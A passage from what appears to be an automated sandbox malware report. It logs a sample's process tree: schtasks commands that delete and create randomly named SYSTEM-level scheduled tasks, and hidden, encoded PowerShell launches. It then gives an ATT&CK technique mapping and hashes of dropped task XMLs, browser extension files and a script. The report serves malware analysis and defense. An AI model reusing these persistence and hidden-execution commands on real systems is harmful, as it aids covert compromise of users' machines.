PID:2648

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "YAjsxgSIQquBU2"
2⤵
PID:2484

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "vnRCnXJDjFgly"
2⤵
PID:2692

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "vnRCnXJDjFgly"
2⤵
PID:3004

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "vnRCnXJDjFgly2"
2⤵
PID:916

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "vnRCnXJDjFgly2"
2⤵
PID:1692

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "URrITWkPVtIxr"
2⤵
PID:1984

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "URrITWkPVtIxr"
2⤵
PID:1444

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "URrITWkPVtIxr2"
2⤵
PID:452

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "URrITWkPVtIxr2"
2⤵
PID:1788

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "fvbPtJKIKiiYC"
2⤵
PID:844

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "fvbPtJKIKiiYC"
2⤵
PID:2884

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "fvbPtJKIKiiYC2"
2⤵
PID:1456

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "fvbPtJKIKiiYC2"
2⤵
PID:816

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "qFUWsypIjqyCl"
2⤵
PID:1276

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qFUWsypIjqyCl"
2⤵
PID:964

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "qFUWsypIjqyCl2"
2⤵
PID:112

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qFUWsypIjqyCl2"
2⤵
PID:896

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "dTnpxKxkbKsoZ"
2⤵
PID:2080

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "dTnpxKxkbKsoZ"
2⤵
PID:1208

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "dTnpxKxkbKsoZ2"
2⤵
PID:2416

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "dTnpxKxkbKsoZ2"
2⤵
PID:2676

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "iTtFzCTVRGxRt"
2⤵
PID:1508

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "iTtFzCTVRGxRt"
2⤵
PID:2556

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "iTtFzCTVRGxRt2"
2⤵
PID:2452

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "iTtFzCTVRGxRt2"
2⤵
PID:2404

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "RqexYqdylWmHLyb2" /F /xml "C:\Program Files (x86)\LjPBjCkxU\iXGGmtk.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:3004

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "RqexYqdylWmHLyb"
2⤵
PID:1852

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "RqexYqdylWmHLyb"
2⤵
PID:1268

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "RcKzCxNzDspESg" /F /xml "C:\Program Files (x86)\EkAcBLsehYBU2\nTMNVQy.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2272

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "mYkAlnQzdfnWB2" /F /xml "C:\ProgramData\PtxASTBQXXYOENVB\yoUakDA.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1720

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FbVloGRvRXpHpvUoC2" /F /xml "C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR\PjAmsXW.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1752

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "dcKGwvyalvyuxhUFuri2" /F /xml "C:\Program Files (x86)\WEPOREuymMJJC\EwEvpwW.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 268
2⤵
- Program crash
PID:1508

C:\Windows\system32\taskeng.exe
taskeng.exe {E85A9CBA-71AC-4CDD-BD4C-AC8811269874} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]
1⤵
PID:1948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1548

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:2084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2644

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:2224

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1608

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2932

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:960

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\EkAcBLsehYBU2\nTMNVQy.xml
Filesize
2KB

MD5
018e50b123b4f12f680ff44d1d83aae6

SHA1
1ac56b926d173de61a2c54bb6e399a24f5b53ce5

SHA256
1a9a7166b611e973889dfb8b2994db6b50d52e41566128175ba027515becc1c2

SHA512
4542b9d86886e8aed1b58bda7d020db090895e7638d950f538ae554670cdaba82b8279113fd37448eebdf070062a3530cfdf67c625249ad2617158babbb693fd

Download Submit
C:\Program Files (x86)\LjPBjCkxU\iXGGmtk.xml
Filesize
2KB

MD5
5c31e2bfafd9b50dd8cd0704c59929f1

SHA1
9b984d1f8ebe66b2bcaa02a2dfadfbf6c10f33f2

SHA256
0dfbd51179c9a3191851375e97ab266dc51188bf4bc345304abc8afb1382f55b

SHA512
4095f4f744e64b91ca1a734864d749c87ea19da8f40ae837a06a86848e3e6d5cc6dc57c0632795e6b8902b12978ac896418b9f5709c8401afb05b7ebab5f9bed

Download Submit
C:\Program Files (x86)\WEPOREuymMJJC\EwEvpwW.xml
Filesize
2KB

MD5
f3675a4feaea2147c79af7ca2c50e19d

SHA1
263fcccf6eb2b0a348d654c7e0a62fb28b844eab

SHA256
3cb57e3481f3436140e17d46bdf09f6c6e7147cdb631e26ec6bb17e53b743c14

SHA512
e77ef9ec7ae34e12f6b2821f2967bdb88906ddfbadcadc10ae61b1df3553412b8c9cc264138e3d2ee7acd2405c92a8b4e9ca8ff48c5cdf1b074939acd2c5f196

Download Submit
C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR\PjAmsXW.xml
Filesize
2KB

MD5
77a68efef59af0cd82a49e056b6a7b65

SHA1
34344362d4c52ad5501c4710568a3aca4ef0b532

SHA256
d48ecc138ad58de771411deeec3e699ca6af4d23341cd3408758ed8da403766e

SHA512
c7fc9c54eb75af8283713fb1859cc4378405e15b3f677fa7bd2aa1270ec28043e4d5377145b39a8dd95e5eb7a64d7e0199c331e4a6694527347338b6ee963949

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{9A9F9ACC-B19C-4B66-8FE8-814016970733}.xpi
Filesize
641KB

MD5
29d64f99db9730d66894cbc55d061585

SHA1
eee03dd28dd14b992ceb024f5b03fa7217e839e9

SHA256
4b68220a718c6ff298c1e10a45bce8e6e4a870cffb261f641fbe99f64b4568c3

SHA512
4fd3dbbca0c02d85b64ad18821d31705a99c0b4095d0f61d4a7a0f460ec273ac362c76e49cbc61080f01c7ff2a3fbc9dfbf347f43818ecc0f6e956cd3c9e733c

Download Submit
C:\ProgramData\PtxASTBQXXYOENVB\yoUakDA.xml
Filesize
2KB

MD5
cdd92fa2b3f6a5c633eaba393b1aea18

SHA1
1a921f777be56da2cf4e24d0a0bb397fc77bef4e

SHA256
602630e9d1c292da28dd025127728053f134afa930faabf685d7dfb6a75f0c33

SHA512
4a4e24fe568c1e4406453a932c3e10e19878fca4157039ee806c7e36583cb0355778c1e74b76047270d45c4f3652617488c21278fa4239918d5648cb7db7ed07

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gimgggabfigedfmidfhmgaaccgefdfnj\1.0_0\_locales\en\messages.json
Filesize
150B

MD5
33292c7c04ba45e9630bb3d6c5cabf74

SHA1
3482eb8038f429ad76340d3b0d6eea6db74e31bd

SHA256
9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249

SHA512
2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gimgggabfigedfmidfhmgaaccgefdfnj\1.0_0\_locales\pt_BR\messages.json
Filesize
161B

MD5
5c5a1426ff0c1128c1c6b8bc20ca29ac

SHA1
0e3540b647b488225c9967ff97afc66319102ccd

SHA256
5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839

SHA512
1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
10KB

MD5
00b1c932b9f64247e8b49a986efdbdf0

SHA1
b56b8f261c503c98c6191c3f481d9acbe5b6cd26

SHA256
870a0109b80f9a495278c8df716922f9b5699048cb659bb4ddf3f329f1c3125e

SHA512
b7df216f4f441afee1ccc67b1b2c2dfac1137a77aa0f4839ffaf38d5fbe243501e5f7c0cc32e2e82f837479e24cea9fb5f464d062fdd41de2938a6d6557ddebb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Filesize
26KB

MD5
1878a90847ee33d30698ba7e293b6913

SHA1
229d24847bcffeba89f911f60c40cd3a244a10da

SHA256
e98c14ac7c519a04e163a7fcc1bea7a1d6720cfc63885a328842851bbd3abeb4

SHA512
fa9155329557a1b7fdc13a048833d52154a2be29b657c29d779edf9cfeedcf369dc1285b9d993f93e0667ce9c05134ec2433e129742cb676df4f8329585f19de

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0X863SD79NJLHH4BTQ1P.temp
Filesize
7KB

MD5
3fab3f4a135ac4deac0585b99d491497

SHA1
21a8bc89cdd5d22ea44f03b755afda8eaf8cd8f4

SHA256
72423871ace0f7ddaed4a721d9fac1e8b22ada8754d4bde36957bbc0972a7270

SHA512
499369f6a0f02f839a25347c895b32dc25ad165209f23ac4cfd62f7f20d89e0b4f87a0f8eb38ea6a448503e50b7180822555d8ebb5d72c4464aa95b615bd0599

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
cd47f5faf7289a9834173341ff3c1b2f

SHA1
fe87bb940db2b09e567e2aea00bb428ba3087c08

SHA256
425a09a6a77cb67ad56ef8728579e2ffbee9f90e4e3b62dadaca0cc74e8541ee

SHA512
85383e973d3e7aea2042aa374a7528144231a72b9c6660c64078b2b3cdf6d5b121badb768d802abca41a1ebdc66c49a8909fa809847fb8bf3539381ae5a39030

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QYSLBUA104CZJ39O5R1I.temp
Filesize
7KB

MD5
54d2420e0bdbba54a5ce5225dc6abe41

SHA1
dc4510baa5bc5ac5389e693fc17f42a5036d06bc

SHA256
b2c54b929e07f9994f522c267082e0b4cf3b606406aabc2a2cdb05f2a7fa5403

SHA512
724ed31c5e7dc04429ecd7511a8a8c3013c60362df670b76cfdfc7142f9bf6e925cb40a882a26d1805f6f0f93fafc90d4371fc7731f0a9519b5e210e4e537c9a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
a424fc277d460cbc72f2e10504964080

SHA1
9e23f33e6ba9c048d95955cf6f6769651342843e

SHA256
7ae844bc3cab876bfd6015014032a1cc6c5042ba1c771d3ff3b0bf86c2ccc912

SHA512
9d53fef5b9436aee5ac0548147fd371ca019e8b3f677beb66b7e737132a2442bc30689f22f54afbc243fb03ef34a634f342df99f9f996ae2f37ea9de7d142f01

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0rowjuc9.default-release\prefs.js
Filesize
6KB

MD5
38333480ead12c04e12097ad90067d2a

SHA1
31188944917ba73b5074d10342f5ae19af164727

SHA256
17b490bf133b54de3914b39f8f4522315c3e07970995572fcc713928780ab670

SHA512
7d33aeb8bb4c6735eb27bb50de6b82cbdb76a978b447a79a2aae63917ba4c2cf611da722126978a27d985908559faedfc72b6c3cbaa32f3d0d591debee9fe8cb

Download Submit
C:\Windows\Temp\dkHlCbgnIThowMMU\BJMBtNcw\zjtYbNKrCOnFnEdF.wsf
Filesize
9KB

MD5
186e95d243a028413ee627e388ec6c32

SHA1
c9f3a1193b3eb7464eec5f9d39357cb1e411d1f4

SHA256
3df3d90ebcc75468a000d1d3527c4eb65f760efdb65d32ecc910cad9c6f17bee

SHA512
09530e4463730a5b6cb8c5f10cd14a1255689d3688fbdcdbb41edea9bf50300a6039d6e9c1e8bb135df8d7e40ddc9f09ffbd6ab59b5977d4ab9b4b47521a6433

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1548-12-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/1548-11-0x000000001B680000-0x000000001B962000-memory.dmp

Filesize
2.9MB

Download
memory/2644-23-0x0000000002000000-0x0000000002008000-memory.dmp

Filesize
32KB

Download
memory/2644-22-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2664-87-0x0000000002D30000-0x0000000002D93000-memory.dmp

Filesize
396KB

Download
memory/2664-51-0x0000000002DB0000-0x0000000002E35000-memory.dmp

Filesize
532KB

Download
memory/2664-276-0x0000000004A50000-0x0000000004ADA000-memory.dmp

Filesize
552KB

Download
memory/2664-286-0x00000000055E0000-0x00000000056C3000-memory.dmp

Filesize
908KB

Download
memory/2664-2-0x0000000010000000-0x00000000105DB000-memory.dmp

Filesize
5.9MB

Download
memory/2848-39-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

Filesize
2.9MB

Download